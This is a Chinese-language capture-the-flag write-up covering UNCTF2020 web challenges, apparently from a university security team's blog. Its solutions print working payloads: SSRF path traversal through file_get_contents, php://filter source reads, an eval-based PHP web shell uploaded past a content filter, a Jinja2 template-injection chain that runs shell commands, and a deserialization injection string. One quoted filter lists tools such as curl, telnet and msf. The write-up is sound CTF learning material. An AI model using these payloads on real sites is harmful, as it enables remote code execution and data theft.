沙漏安全团队
欢迎真正热爱技术的你!
正 文
然后查了一篇师傅的博客记载了一个SSRF的一个黑魔法:代码很简单,参数中要有unctf.com,而且过滤了php|file|zip|bzip|zlib|base|data,导致很多协议用不了,查了查资料发现涉及到SSRF file_get_contents函数都是利用的file协议等,一开始也没思路要怎么绕过去。0x01:easy_ssrf
当PHP的 file_get_contents() 函数在遇到不认识的伪协议头时候会将伪协议头当做文件夹,造成目录穿越漏洞,这时候只需不断往上跳转目录即可读到根目录的文件。这个方法可以在SSRF的众多协议被ban的情况下来进行读取文件
发现确实可以造成目录穿越,直接读取下flag
0x02:babyeval
过滤了带括号的函数,可以使用echo进行输出内容,通过include包含flag.php,再输出变量即可(感觉是非预期,因为ob_start函数没有用到)
payload:
?a=include "flag.php";echo $flag;ob_start([string output_callback])- 打开输出缓冲区,所有的输出信息不在直接发送到浏览器,而是保存在输出缓冲区里面,可选择回调函数用于处理输出结果信息。
这道题设置的是输出信息中不能存在flag,所以可以利用编码绕过
?a=echo `base64 flag.php`;
也可以通过include+伪协议去读取
?a=include 'php://filter/read=convert.base64-encode/resource=./flag.php';0x03:ezphp
bool类型的true跟任意字符串可以弱类型相等。因此我们可以构造bool类型的序列化数据 ,无论比较的值是什么,结果都为true
payload:
<?phperror_reporting(0);$shy='';$shy=array("username"=>1,"password"=>1);echo var_dump($shy);echo var_dump(serialize($shy));$shy='';$shy=array("username"=>true,"password"=>true);echo var_dump($shy);echo var_dump(serialize($shy));?>
0x04:easy_upload
上传一个php文件,发现过滤了以下内容
perl|pyth|ph|auto|curl|base||>|rm|ryby|openssl|war|lua|msf|xter|telnet in contents!查了资料,发现是De1CTF2020的原题,既然过滤了ph,可以使用换行进行绕过
还过滤了>,可以使用
<?=eval($_POST['cmd']);#绕过<?php ?>限制的一句话
上传进去,蚁剑连接之后便可以在根目录中发现flag
0x05:L0vephp
提示是查看页面源码
一开始也不知道是什么编码,查了查字资料发现是base85(也称为Ascii85)可以参考一下 https://www.cnblogs.com/0yst3r-2046/p/11962942.html 在线解一下,得到
提示读取一下源码,尝试一下伪协议读取,发现
?action=php://filter/read=convert.base64-encode/resource=index.php
发现被过滤了,再试试其他方法,发现换成以下两种都可以
?action=php://filter/read=string.toupper|string.rot13/resource=flag.php?action=php://filter/convert.quoted-printable-encode/resource=flag.php
解密得到
<!--?PHP$FLAG = "UNCTF{7HIS_IS_@_F4KE_F1A9}";//HINT:316E4433782E706870?-->
得到1nD3x.php,得到以下源码
<?phperror_reporting(0);show_source(__FILE__);$code=$_REQUEST['code'];$_=array('@','~','^','&','?','<','>','*','`','+','-',''','"','\\','/');$__=array('eval','system','exec','shell_exec','assert','passthru','array_map','ob_start','create_function','call_user_func','call_user_func_array','array_filter','proc_open');$blacklist1 = array_merge($_);$blacklist2 = array_merge($__);if (strlen($code)>16){die('Too long');}foreach ($blacklist1 as $blacklisted) {if (preg_match ('/' . $blacklisted . '/m', $code)) {die('WTF???');}}foreach ($blacklist2 as $blackitem) {if (preg_match ('/' . $blackitem . '/im', $code)) {die('Sry,try again');}}@eval($code);?>
之前无命令进行构造,长度没有限制的这么短,而且这道题过滤了很多,之前的异或什么的都走不通,查资料看了P神的这篇文章,发现了新的思路,真的是tttttql eval长度限制绕过 && PHP5.6新特性
按照P神的payload即可获取到flag,有空要仔细研究一下。
0x06:easyflask
一看名字就猜测是不是ssti,进去之后需要先以admin用户登陆进去,发现存在login和register路由,以admin用户注册一个账号即可获取到/secret_route_you_do_not_know路由
http://697940e0-e21b-4cad-8504-a3834c796ea7.node1.hackingfor.fun/secret_route_you_do_not_know?guess={{config}}在该路由下存在ssti漏洞,但是过滤以下字符
' " [ ] _可以使用|attr和request.args.xx来绕过下划线和引号,request.args存储着请求参数以及其值的字典,接下来就是构造payload即可
{{()|attr(request.args.class)|attr(request.args.bases)|attr(request.args.subclasses)()|attr(request.args.a)(117)|attr(request.args.b)|attr(request.args.c)|attr(request.args.d)(request.args.e)(request.args.f)|attr(request.args.g)()}}&class=__class__&bases=__base__&subclasses=__subclasses__&a=__getitem__&b=__init__&c=__globals__&d=get&e=popen&f=cat flag.txt&g=read
0x07:easyunserialize
先拉到本地测试一下,修改一下源码,让结果回显出来
观察代码也很简单,用户名没有限制,密码必须为easy,才可以得到flag,就先正常反序列化一个这样的payload
O:1:"a":3:{s:5:"uname";s:5:"1emon";s:8:"password";s:4:"easy";}其中";s:8:"password";s:4:"easy";}是29个字符,下面就是一个数学问题了,过滤后字符变多了四个,把";s:8:"password";s:4:"easy";}给挤出去,闭合之前的值1即可
strlen(challenge(9)*n+29)=strlen(easychallenge(13)*n)9*n+29=13*n4n=29+3n=>8
多出三个字符,前面肯定是不能添加的,所以可以放在最后面,根据反序列化的特点超出的部分并不会被反序列化成功,所以不会产生任何影响,payload如下:
?1=challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";}shy总结
还有几道题当时没做出来,等这几天事忙了完,再回头了做下!
平顶山学院· 沙漏安全团队
微信号|SLteam666
奋发努力|拼搏向上
本期编辑|yu jian
本文始发于微信公众号(网络安全攻防训练营):UNCTF2020 _ Web Wp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论